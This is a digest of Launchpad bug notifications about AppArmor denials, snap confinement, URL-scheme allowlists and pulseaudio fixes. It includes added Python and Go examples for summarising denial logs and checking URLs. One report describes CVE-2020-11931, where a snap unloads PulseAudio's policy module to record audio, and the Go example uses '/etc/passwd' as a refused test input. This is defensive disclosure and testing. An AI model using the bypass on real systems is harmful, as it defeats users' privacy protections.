  On a fully up to date xubuntu 20-04 system, when i run evince and click on a link, it fails to follow that link in my browser. This kind of thing happens when you are reading a technical paper and want to follow one of the references and click on the doi or url.

  When i click on the link i get a box that i cannot copy from that says:

  Failed to launch preferred application for category "WebBrowser".

  Failed to execute child process "/usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2"(Permission denied).

  Did I say that it is annoying that i could not copy the text in this box!!

  The output of the ldd command you asked for is attached.

  I should also point out that this worked fine under xubuntu 18.04.

  I had originally posted this as an additional comment on https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1869159?comments=all but https://launchpad.net/~seb128 said that I should submit this as a separate bug because this is likely an apparmor configuration problem that is similar to the ancient bug https://bugs.launchpad.net/bugs/987578.
[Desktop-packages] [Bug 1580463] Re: Snap blocks access to system input methods (ibus, fcitx, ...)
I agree that a new bug should be filed. When doing so, please attach any relevant policy violations from journalctl to the bug.

--
https://bugs.launchpad.net/bugs/1580463

Title: Snap blocks access to system input methods (ibus, fcitx, ...)

Status in ibus: Fix Released
Status in apparmor package in Ubuntu: Fix Released
Status in ibus package in Ubuntu: Fix Released
Status in im-config package in Ubuntu: Fix Released
Status in snapd package in Ubuntu: Fix Released
Status in apparmor source package in Xenial: Fix Released
Status in im-config source package in Xenial: Fix Released
Status in snapd source package in Xenial: Fix Released
Status in apparmor source package in Yakkety: Fix Released
Status in im-config source package in Yakkety: Fix Released
Status in snapd source package in Yakkety: Fix Released

Bug description:
  = SRU im-config =

  [Impact]
  ibus-daemon by default uses a unix socket name of /tmp/dbus-... that is indistinguishable from dbus-daemon abstract sockets. While dbus-daemon has AppArmor mediation, ibus-daemon does not so it is important that its abstract socket not be confused with dbus-daemon's. By modifying ibus-daemon's start arguments to use "--address 'unix:tmpdir=/tmp/ibus'" AppArmor can continue mediating DBus abstract sockets like normal and also mediate access to the ibus-daemon-specific abstract socket via unix rules. This also tidies up the abstract socket paths so that it is clear which are for ibus-daemon, which for dbus-daemon, etc.

  The upload simply adjusts 21_ibus.rc to start ibus-daemon with "--address 'unix:tmpdir=/tmp/ibus'" and adds a comment. No compiled code changes are required.

  [Test Case]
  1. start a unity session before updating to the package in -proposed
  2. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0
     IBUS_ADDRESS=unix:abstract=/tmp/dbus-Vyx8fGFA,guid=28e8e7e89f902c8d4e9d77c5557add76
  3. $ lsof -p $(pidof ibus-daemon) | grep '/dbus'
     ibus-daem 2973 jamie8u unix 0x 0t0 29606 @/tmp/dbus-oxKYpN30 type=STREAM
  4. update the package in -proposed and perform '2' and '3'. The IBUS_ADDRESSES should be the same as before
  5. logout of unity, then log back in
  6. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0
     IBUS_ADDRESS=unix:abstract=/tmp/ibus/dbus-SpxOl8Fc,guid=06d4bbeb07614c6dffbf221c57473f4e
     (notice '/tmp/ibus/' in the path)
  7. $ lsof -p $(pidof ibus-daemon) | grep '/dbus'
     ibus-daem 3471 jamie8u unix 0x 0t0 26107 @/tmp/ibus/dbus-SpxOl8Fc type=STREAM
     ...
     (notice '@/tmp/ibus/' in the path)

  In addition to the above, you can test for regressions by opening 'System Settings' under the 'gear' icon in the panel and selecting 'Text Entry'. From there, add an input source on the right, make sure 'Show current input source in the menu bar' is checked, then use the input source panel indicator to change input sources.

  Extended test case to verify input support still works in unconfined and confined applications:
  1. Systems Settings Language Support, if prompted install the complete language support
  2. Install Chinese (simple and traditional)
  3. sudo apt-get install ibus-pinyin ibus-sunpinyin
  4. logout / login
  5. System Settings / Text Entry - add Chinese (Pinyin) (IBus)
  6. select pinyin from the indicator
  7. sudo lsof | grep ibus | grep @ # will use @/tmp/dbus-...
  8. open gnome-calculator and try to type something in (should get a pop-up)
  9. open evince and try to search a pdf (should get a pop up)
  10. upgrade apparmor and im-config from xenial-proposed
  11. logout and back in
  12. sudo lsof | grep ibus | grep @ # will use @/tmp/ibus/...
  13. open gnome-calculator and try to type something in (should get a pop-up)
  14. open evince and try to search a pdf (should get a pop up)
  15. verify no new apparmor denials

  [Regression Potential]
  The regression potential is considered low because there are no compiled code changes and because the changes only occur after ibus-daemon is restarted, which is upon session start, not package upgrade. When it is restarted, the files in ~/.config/ibus/bus/*-unix-0 are updated accordingly for other applications to pick up.

  This change intentionally requires a change to the unity7 snapd interface, which is already done.

  This change intentionally requires a change to apparmor to add a unix rule for communicating with the new ibus address. This is in xenial-proposed 2.10.95-0ubuntu2.3 (and 2.10.95-0ubuntu2.4). The packages changes to im-config use 'Breaks: apparmor (<< 2.10.95-0ubuntu2.3)' to ensure that the apparmor abstraction is updated and policy recompiled before ibus is restarted. This was omitted from the initial im-config upload which resulted in bug #1588197.

  Test cases
[Desktop-packages] [Bug 1881294] Re: Apparmor blocks evince GUI-Input-Dialogs
*** This bug is a duplicate of bug 1856738 ***
    https://bugs.launchpad.net/bugs/1856738

@Reinhard, you are now hitting bug #1856738 which prevents @{HOME} from being used in the peer_addr for an abstract socket. For now, I suggest updating /etc/apparmor.d/abstractions/ibus to have:

  unix (connect, receive, send)
       type=stream
       peer=(addr="@/home/teachers/*/.cache/ibus/dbus-*"),

** This bug has been marked a duplicate of bug 1856738
   access always denied when using @{HOME} tunable in peer_addr for abstract socket

--
https://bugs.launchpad.net/bugs/1881294

Title: Apparmor blocks evince GUI-Input-Dialogs

Status in evince package in Ubuntu: Invalid

Bug description:
  Network Users (LDAP + NFS4 home) cannot interact with evince GUI-input-elements.

  * page navigation per number not possible
  * select pages to print not possible
  * save open PDF with different name not possible

  Local user on the same machine behaves as expected.

  apparmor messages in /var/log/syslog

  May 29 14:37:07 r002pc51 kernel: [15848.736916] audit: type=1400 audit(1590755827.768:827): apparmor="DENIED" operation="file_lock" profile="/usr/bin/evince" name="/home/teachers/ttfinr/.cache/event-sound-cache.tdb.2176809057334199ab75052753e0683a.x86_64-pc-linux-gnu" pid=34988 comm="evince" requested_mask="k" denied_mask="k" fsuid=4515 ouid=4515
  May 29 14:37:07 r002pc51 kernel: [15848.739259] audit: type=1400 audit(1590755827.772:828): apparmor="DENIED" operation="link" profile="/usr/bin/evince" name="/home/teachers/ttfinr/.local/share/gvfs-metadata/.open04eaJ8" pid=34988 comm="pool-evince" requested_mask="l" denied_mask="l" fsuid=4515 ouid=4515 target="/home/teachers/ttfinr/.local/share/gvfs-metadata/home"
  May 29 14:37:07 r002pc51 kernel: [15848.739974] audit: type=1400 audit(1590755827.772:829): apparmor="DENIED" operation="open" profile="/usr/bin/evince" name="/run/user/4515/gvfs-metadata/.openumWxE7" pid=34988 comm="pool-evince" requested_mask="r" denied_mask="r" fsuid=4515 ouid=4515
  May 29 14:37:07 r002pc51 kernel: [15848.740088] audit: type=1400 audit(1590755827.772:830): apparmor="DENIED" operation="unlink" profile="/usr/bin/evince" name="/run/user/4515/gvfs-metadata/.openumWxE7" pid=34988 comm="pool-evince" requested_mask="d" denied_mask="d" fsuid=4515 ouid=4515
[Desktop-packages] [Bug 1721704] Re: Printer settings stuck on loading drivers database
@Till, the boot_id issue is being tracked here: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1872564

--
https://bugs.launchpad.net/bugs/1721704

Title: Printer settings stuck on loading drivers database

Status in apparmor package in Ubuntu: New
Status in system-config-printer package in Ubuntu: Incomplete

Bug description:
  1) Description: Ubuntu Artful Aardvark (development branch)
     Release: 17.10
  2) ubuntu-settings:
       Installed: 17.10.17
       Candidate: 17.10.17
  3) The printer configuration goes fine and I can print
  4) Printer settings stuck on loading drivers database and finally no drivers list available. Only 'cancel' button active.

  Note: I'm trying to configure a Brother HL-2030 connected to Network through a FritzBox 7940 router. The printer works fine both on Fedora and macOS X systems.

  I opened 'System Settings', then select 'Devices' > 'Printers' > 'Add a Printer'. I entered the router address and the window shows me correctly a 'JetDirect-Printer' on 192.168.178.1. I selected the printer and pressed the 'Add' button, a window 'Select Printer Driver' appears and stuck with 'Loading drivers database...'. After about 2 minutes, stopped loading and remains blank. No drivers selection is available and I can only push the 'Cancel' button.
[Desktop-packages] [Bug 1878621] Re: [snap] uim input method does not work
I suggest following/participating in the discussion in the forum topic for snapd/ecosystem updates and use this bug to track chromium-browser's use of those updates.

--
https://bugs.launchpad.net/bugs/1878621

Title: [snap] uim input method does not work

Status in chromium-browser package in Ubuntu: Confirmed

Bug description:
  I use the uim input method, which works fine with non-snap apps, and used to work with the non-snap package of Chromium.

  In 20.04, chromium package now becomes a snap, and uim input method no longer works (rendering the browser useless).

  With some searching I found similar issues with other input methods, some of which have been addressed. It appears that it is now the responsibility of every snap packager to support input methods, and the snap cannot rely upon system-configured methods. So please support UIM.
[Desktop-packages] [Bug 1876065] Re: After unplug headphones and plug them again no sound can be heard
Rather than superseding 1:13.99.1-1ubuntu4 in groovy-proposed, I instead based the changes in 1:13.99.1-1ubuntu5 on top of 1:13.99.1-1ubuntu4 to address the CVE that was fixed in https://usn.ubuntu.com/4355-1/.

** Also affects: pulseaudio (Ubuntu Groovy)
   Importance: High
     Assignee: Kai-Heng Feng (kaihengfeng)
       Status: Fix Committed

--
https://bugs.launchpad.net/bugs/1876065

Title: After unplug headphones and plug them again no sound can be heard

Status in pulseaudio package in Ubuntu: Fix Committed
Status in pulseaudio source package in Focal: Fix Committed
Status in pulseaudio source package in Groovy: Fix Committed

Bug description:
  * Impact
  Sound isn't automatically redirected to headphones when those are connected to a jack interface

  * Test case
  Disconnect the headsets
  Start your webbrowser/music player/video player and play some sound
  Connect the headsets to the jack interface
  -> the sound should be directly redirected to the plugged headsets

  * Regression potential
  Check that audio routing when connecting/disconnecting devices to the jack entry is working correctly

  After startup with headset plugged in they play sound nicely - no issue. When they are unplugged, the sound is switched to the speaker (laptop) - all good. However, when I plug the headset back there is no sound. I see the app on pavucontrol, the volume is fine - everything looks fine except there is no sound.

  I dumped output of "pactl list" command on startup (headset plugged), after unplugging the headset, and when it is plugged back. From the comparison of these outputs, it looks like the source has got muted after the headset is plugged.

  Source #1
      State: RUNNING
      Name: alsa_input.pci-_00_1f.3.analog-stereo
      Description: Built-in Audio Analog Stereo
      Driver: module-alsa-card.c
      Sample Specification: s16le 2ch 44100Hz
      Channel Map: front-left,front-right
      Owner Module: 7
      Mute: yes

  Attached three outputs:
  headset-in.txt - after startup with headset plugged - all fine.
  headset-out.txt - after unplugged headset - sound through the speaker - all fine.
  headset-back.txt - after plugged headset back - no sound.

  Any help greatly appreciated.
  Regards,
  Roman
[Desktop-packages] [Bug 1877102] Re: snap policy module can be unloaded, circumventing audio recording restrictions for snaps
Uploaded https://launchpad.net/ubuntu/+source/pulseaudio/1:13.99.1-1ubuntu5 to groovy based on 1:13.99.1-1ubuntu4 from groovy-proposed.

** Changed in: pulseaudio (Ubuntu Groovy)
       Status: In Progress => Fix Committed

--
https://bugs.launchpad.net/bugs/1877102

Title: snap policy module can be unloaded, circumventing audio recording restrictions for snaps

Status in pulseaudio package in Ubuntu: Fix Committed
Status in pulseaudio source package in Xenial: Fix Released
Status in pulseaudio source package in Bionic: Fix Released
Status in pulseaudio source package in Eoan: Fix Released
Status in pulseaudio source package in Focal: Fix Released
Status in pulseaudio source package in Groovy: Fix Committed

Bug description:
  This collates information about a security vulnerability discussed in email. It has been assigned CVE-2020-11931.

  Ubuntu's PulseAudio package is shipped with a custom "module-snap-policy" module intended to restrict snap confined clients from recording audio unless they have the "audio-record" plug connected. However, it does not restrict access to the "PA_COMMAND_UNLOAD_MODULE" command. This allows a snap that has only plugged "audio-playback" to request that PulseAudio unload the security policy module, which in turn makes it possible to record audio.
[Desktop-packages] [Bug 1877102] Re: snap policy module can be unloaded, circumventing audio recording restrictions for snaps
I'll apply the focal patch to what is in groovy-proposed.

** Changed in: pulseaudio (Ubuntu Groovy)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: pulseaudio (Ubuntu Groovy)
       Status: Triaged => In Progress

--
https://bugs.launchpad.net/bugs/1877102

Title: snap policy module can be unloaded, circumventing audio recording restrictions for snaps

Status in pulseaudio package in Ubuntu: In Progress
Status in pulseaudio source package in Xenial: Fix Released
Status in pulseaudio source package in Bionic: Fix Released
Status in pulseaudio source package in Eoan: Fix Released
Status in pulseaudio source package in Focal: Fix Released
Status in pulseaudio source package in Groovy: In Progress
[Desktop-packages] [Bug 1869819] Re: [SRU] System can't detect external headset in the codec of Conexant
FYI, the upload to bionic-proposed was superseded by https://usn.ubuntu.com/4355-1/. Please rebase your changes on that and reupload.

--
https://bugs.launchpad.net/bugs/1869819

Title: [SRU] System can't detect external headset in the codec of Conexant

Status in OEM Priority Project: Confirmed
Status in OEM Priority Project bionic series: New
Status in pulseaudio package in Ubuntu: Fix Released
Status in pulseaudio source package in Bionic: In Progress
Status in pulseaudio source package in Focal: Fix Released

Bug description:
  [Impact]
  In some hp's devices, there are two audio jacks (one headset and one headphone) in the audio interface which is using the codec of Conexant, and apparently it's not working, the system can't detect the headset in current codec.

  [Test Case]
  1. Insert 4 rings(3 stripes) headset into front audio port (headset icon)
  2. Check System Setting->Sound->Output

  [Expected result]
  Can detect external headset

  [Actual result]
  Only shows internal speaker. External headset microphone was detected. Another front audio port (earphone icon) works fine.

  [Regression Potential]
  Low.

  [Failure rate]
  100%

  [Additional information]
  system-product-name: HP EliteDesk 800 G5 SFF
  CPU: Intel(R) Core(TM) i7-9700 CPU @ 3.00GHz (8x)
  GPU: 00:02.0 VGA compatible controller [0300]: Intel Corporation Device [8086:3e98] (rev 02)
  OS-version: 18.04
  kernel-version: 4.15.0-1065-oem
  pulseaudio-version: 1:11.1-1ubuntu7.2

  Upstream issue: https://gitlab.freedesktop.org/pulseaudio/pulseaudio/-/merge_requests/272
  Ubuntu-Focal-Source: https://code.launchpad.net/~hugh712/ubuntu/+source/pulseaudio/+git/pulseaudio/+ref/focal-1869819
  PPA: https://launchpad.net/~hugh712/+archive/ubuntu/sru-1869819
[Desktop-packages] [Bug 1876065] Re: After unplug headphones and plug them again no sound can be heard
FYI, the upload to focal-proposed was superseded by https://usn.ubuntu.com/4355-1/. Please rebase your changes on that and reupload.

--
https://bugs.launchpad.net/bugs/1876065

Title: After unplug headphones and plug them again no sound can be heard

Status in pulseaudio package in Ubuntu: Fix Committed
Status in pulseaudio source package in Focal: Fix Committed
[Desktop-packages] [Bug 1877102] Re: snap policy module can be unloaded, circumventing audio recording restrictions for snaps
** Changed in: pulseaudio (Ubuntu Groovy)
   Importance: High => Medium

** Changed in: pulseaudio (Ubuntu Focal)
   Importance: Undecided => Medium

** Changed in: pulseaudio (Ubuntu Eoan)
   Importance: Undecided => Medium

** Changed in: pulseaudio (Ubuntu Bionic)
   Importance: Undecided => Medium

** Changed in: pulseaudio (Ubuntu Xenial)
   Importance: Undecided => Medium

** Information type changed from Private Security to Public Security

--
https://bugs.launchpad.net/bugs/1877102

Title: snap policy module can be unloaded, circumventing audio recording restrictions for snaps

Status in pulseaudio package in Ubuntu: Triaged
Status in pulseaudio source package in Xenial: Fix Released
Status in pulseaudio source package in Bionic: Fix Released
Status in pulseaudio source package in Eoan: Fix Released
Status in pulseaudio source package in Focal: Fix Released
Status in pulseaudio source package in Groovy: Triaged
[Desktop-packages] [Bug 1873764] Re: CUPS Apparmor Error opening /proc/sys/kernel/random/boot_id
*** This bug is a duplicate of bug 1872564 ***
    https://bugs.launchpad.net/bugs/1872564

This is a dupe of https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1872564 which, AIUI, the server team will be performing an SRU for.

** This bug has been marked a duplicate of bug 1872564
   /proc/sys/kernel/random/boot_id rule missing from abstractions/nameservice

--
https://bugs.launchpad.net/bugs/1873764

Title: CUPS Apparmor Error opening /proc/sys/kernel/random/boot_id

Status in cups package in Ubuntu: Confirmed

Bug description:
  I noted the following messages on a just installed Ubuntu Focal:

  $ dmesg | grep cups
  [ 1769.505132] audit: type=1400 audit(1587372138.575:3011): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=15230 comm="cups-browsed" capability=23 capname="sys_nice"
  [ 1776.623181] audit: type=1400 audit(1587372145.693:3012): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=15510 comm="cups-browsed" capability=23 capname="sys_nice"
  [ 2040.426033] audit: type=1400 audit(1587372409.494:3013): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2040.426044] audit: type=1400 audit(1587372409.494:3014): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2040.426074] audit: type=1400 audit(1587372409.494:3015): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2040.426092] audit: type=1400 audit(1587372409.494:3016): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2040.426106] audit: type=1400 audit(1587372409.494:3017): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2041.404914] audit: type=1400 audit(1587372410.473:3018): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2041.404920] audit: type=1400 audit(1587372410.473:3019): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2041.404926] audit: type=1400 audit(1587372410.473:3020): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2041.404953] audit: type=1400 audit(1587372410.473:3021): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2041.404963] audit: type=1400 audit(1587372410.473:3022): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2071.925327] audit: type=1400 audit(1587372440.994:3028): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2071.925330] audit: type=1400 audit(1587372440.994:3029): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2071.925337] audit: type=1400 audit(1587372440.994:3030): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2071.925382] audit: type=1400 audit(1587372440.994:3031): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2071.925391] audit: type=1400 audit(1587372440.994:3032): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  It happened after installing Brother DCPL3550CDW Linux drivers.

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: cups-daemon 2.3.1-9ubuntu1
  ProcVersionSignature: Ubuntu 5.4.0-25.29-lowlatency 5.4.30
  Uname: Linux 5.4.0-25-lowlatency x86_64
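The denial records quoted in the reports above repeat the same event many times. As an added example (not part of the original messages and not AppArmor's own tooling), this Python script collapses `apparmor="DENIED"` records into unique denials with counts and derives a candidate profile rule for each one to review by hand. The sample log is constructed in the formats quoted above; the function names, the shortened host name and the hex-encoded path are assumptions of the example.

```python
import re
from collections import Counter
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample input in the formats quoted above (dmesg and syslog).
# It includes a repeat, a complain-mode ALLOWED record, an unrelated line and
# a hex-encoded name (the audit subsystem hex-encodes values that contain
# spaces or other special characters and leaves them unquoted).
SAMPLE_LOG = """\
[ 1769.505132] audit: type=1400 audit(1587372138.575:3011): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=15230 comm="cups-browsed" capability=23 capname="sys_nice"
[ 2040.426033] audit: type=1400 audit(1587372409.494:3013): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 2040.426044] audit: type=1400 audit(1587372409.494:3014): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
May 29 14:37:07 host kernel: [15848.740088] audit: type=1400 audit(1590755827.772:830): apparmor="DENIED" operation="unlink" profile="/usr/bin/evince" name="/run/user/4515/gvfs-metadata/.openumWxE7" pid=34988 comm="pool-evince" requested_mask="d" denied_mask="d" fsuid=4515 ouid=4515
May 29 14:37:08 host kernel: [15849.000001] audit: type=1400 audit(1590755828.000:831): apparmor="DENIED" operation="open" profile="/usr/bin/evince" name=2F686F6D652F752F4D7920446F6373 pid=34988 comm="evince" requested_mask="r" denied_mask="r" fsuid=4515 ouid=4515
May 29 14:37:08 host kernel: [15849.000002] audit: type=1400 audit(1590755828.000:832): apparmor="ALLOWED" operation="open" profile="/usr/bin/evince" name="/etc/hosts" pid=34988 comm="evince" requested_mask="r" denied_mask="r" fsuid=4515 ouid=4515
systemd[1]: Started CUPS Scheduler.
"""

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
HEX_RE = re.compile(r"(?:[0-9A-Fa-f]{2})+")
HEX_ENCODABLE = {"name", "profile", "comm"}
# The log reports create (c) and delete (d); profile syntax grants both via w.
LOG_TO_RULE_PERM = {"c": "w", "d": "w"}


class Denial(NamedTuple):
    profile: str
    operation: str
    target: str  # file path, or capability name for operation="capable"
    mask: str    # denied_mask; empty for capability checks


def parse_fields(line: str) -> dict:
    """Extract key=value pairs, decoding unquoted hex-encoded string fields."""
    fields = {}
    for match in FIELD_RE.finditer(line):
        key, quoted, bare = match.groups()
        if quoted is not None:
            fields[key] = quoted
        elif key in HEX_ENCODABLE and HEX_RE.fullmatch(bare):
            fields[key] = bytes.fromhex(bare).decode("utf-8", "replace")
        else:
            fields[key] = bare
    return fields


def parse_denial(line: str) -> Optional[Denial]:
    """Return a Denial for an enforced AppArmor denial, None for anything else."""
    f = parse_fields(line)
    if f.get("apparmor") != "DENIED":
        return None
    target = f.get("name") or f.get("capname") or ""
    return Denial(f.get("profile", "?"), f.get("operation", "?"),
                  target, f.get("denied_mask", ""))


def summarize(log_text: str) -> List[Tuple[Denial, int]]:
    """Unique denials with their counts, most frequent first."""
    counts = Counter(d for d in map(parse_denial, log_text.splitlines()) if d)
    return sorted(counts.items(), key=lambda item: (-item[1], item[0]))


def candidate_rule(d: Denial) -> str:
    """Rule text to review, or '' when a human has to decide."""
    if d.operation == "capable" and d.target:
        return f"capability {d.target},"
    if not d.target or not d.mask or "x" in d.mask:
        return ""  # sockets, signals, D-Bus, or exec (needs a transition mode)
    perms = "".join(dict.fromkeys(LOG_TO_RULE_PERM.get(c, c) for c in d.mask))
    path = f'"{d.target}"' if re.search(r"\s", d.target) else d.target
    return f"{path} {perms},"


if __name__ == "__main__":
    for denial, count in summarize(SAMPLE_LOG):
        rule = candidate_rule(denial) or "(review by hand)"
        print(f"{count:3d}x {denial.profile}: {denial.operation} "
              f"{denial.target!r} -> {rule}")
```

A candidate rule only restates what was denied; whether the access belongs in the profile, or in a shared abstraction as in the boot_id case above, is still a policy decision.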
[Desktop-packages] [Bug 1869819] Re: [SRU] System can't detect external headset in the codec of Conexant
FYI, there is a pending update that will go out either tomorrow or early next week. Please base your next upload on this update.

--
https://bugs.launchpad.net/bugs/1869819

Title: [SRU] System can't detect external headset in the codec of Conexant

Status in OEM Priority Project: Confirmed
Status in OEM Priority Project bionic series: New
Status in pulseaudio package in Ubuntu: Fix Released
Status in pulseaudio source package in Bionic: In Progress
Status in pulseaudio source package in Focal: Fix Released
[Desktop-packages] [Bug 1776873] Re: Whitelisted allowedURLschemes breaks some desktop apps
FYI, in recent PR discussions[1] we've acknowledged that we should make it easier to allow different URL schemes into snapd and I laid out some criteria/process ideas on how to make this happen, and I applied that criteria to the zoommtg PR and it was merged quickly. I discussed with Samuele that we could make this go even faster if we codify things for reviewers as well as some other implementation details. In short, today, the snapd team is in a position to be more responsive with adding new url schemes and we'll make it so we can go even faster.

For people who want snapd to support new URL schemes I suggest doing one of:

* if you are able, submitting a PR to snapd[2] for the URL schemes you are interested in
* filing a new bug[3] for the requested url scheme (eg, "add support for url scheme ...") and then someone can take a look

Thanks

[1] https://github.com/snapcore/snapd/pull/7731#pullrequestreview-362900171
[2] https://github.com/snapcore/snapd
[3] https://bugs.launchpad.net/snapd/+filebug

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1776873

Title: Whitelisted allowedURLschemes breaks some desktop apps

Status in snapd: Triaged
Status in chromium-browser package in Ubuntu: Confirmed

Bug description:

https://github.com/snapcore/snapd/blob/7952972d4897e085030b288e44dc98b824f6723a/userd/launcher.go#L55

snapd has a hard-coded list of allowed URL schemes. Currently that is limited to "http", "https", "mailto", "snap". We have a number of applications in the store which are trying to use protocol handlers outside this scope and break when that's not possible.

e.g.
Telegram Desktop: tg:/
Github Desktop: git:/
IRCCloud Desktop: irc:/

These are the ones I know of, others may also be affected.

Can we please at least expand the list to those that we know of, and perhaps research other popular protocol handlers?

Ideally we wouldn't have a whitelist, because this delays our ability to land new applications with as-yet unknown url schemes.

To manage notifications about this bug go to:
https://bugs.launchpad.net/snapd/+bug/1776873/+subscriptions

--
Mailing list: https://launchpad.net/~desktop-packages
Post to : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
More help : https://help.launchpad.net/ListHelp
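The allowlist behaviour described in bug 1776873, as an added example that is not snapd's own code: it checks URLs against the four schemes the report quotes and lists which requested schemes are refused. The function names, the `withSchemes` helper and the sample URLs are assumptions constructed for illustration.

```go
package main

import (
	"fmt"
	"net/url"
	"sort"
	"strings"
)

// allowedSchemes holds the four schemes the bug report quotes as snapd's
// hard-coded list. It belongs to this example, not to snapd.
var allowedSchemes = map[string]bool{
	"http": true, "https": true, "mailto": true, "snap": true,
}

// sampleRequests are constructed URLs of the kind a confined app might ask
// the host to open, including the tg, git and irc schemes from the report.
var sampleRequests = []string{
	"https://example.com/download",
	"HTTPS://EXAMPLE.COM/",
	"mailto:user@example.com",
	"snap://hello-world",
	"tg://resolve?domain=example",
	"git://example.com/repo.git",
	"irc://irc.example.net/channel",
	"/etc/passwd", // no scheme at all
}

// checkURL returns nil when raw may be passed on to the host's URL handler.
// Unparseable input and input without a scheme are refused, so a bare path
// can never reach the handler.
func checkURL(raw string, allowed map[string]bool) error {
	u, err := url.Parse(raw)
	if err != nil {
		return fmt.Errorf("cannot parse %q: %v", raw, err)
	}
	scheme := strings.ToLower(u.Scheme)
	if scheme == "" {
		return fmt.Errorf("%q has no scheme", raw)
	}
	if !allowed[scheme] {
		return fmt.Errorf("scheme %q is not allowed", scheme)
	}
	return nil
}

// blockedSchemes returns the sorted, distinct schemes in requests that the
// allowlist refuses: the list a maintainer would review before extending it.
func blockedSchemes(requests []string, allowed map[string]bool) []string {
	seen := map[string]bool{}
	for _, raw := range requests {
		u, err := url.Parse(raw)
		if err != nil || u.Scheme == "" {
			continue // not a scheme problem; checkURL reports these
		}
		if s := strings.ToLower(u.Scheme); !allowed[s] {
			seen[s] = true
		}
	}
	out := make([]string, 0, len(seen))
	for s := range seen {
		out = append(out, s)
	}
	sort.Strings(out)
	return out
}

// withSchemes returns a copy of base extended by extra, leaving base intact,
// so each addition stays an explicit, reviewable change.
func withSchemes(base map[string]bool, extra ...string) map[string]bool {
	out := make(map[string]bool, len(base)+len(extra))
	for s := range base {
		out[s] = true
	}
	for _, s := range extra {
		out[strings.ToLower(s)] = true
	}
	return out
}

func main() {
	for _, raw := range sampleRequests {
		if err := checkURL(raw, allowedSchemes); err != nil {
			fmt.Printf("refused  %-34s %v\n", raw, err)
		} else {
			fmt.Printf("allowed  %s\n", raw)
		}
	}
	fmt.Println("schemes refused:", blockedSchemes(sampleRequests, allowedSchemes))
}
```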
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
I confirmed that https://people.canonical.com/~ubuntu-archive/proposed-migration/xenial/update_excuses.html shows no autopkgtest regression for xenial. I also ran through the TEST CASE for this bug and xenial passed. Marking verification-done-xenial

** Tags removed: verification-failed-xenial
** Tags added: verification-done-xenial

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1781428

Title: please enable snap mediation support

Status in pulseaudio package in Ubuntu: Fix Released
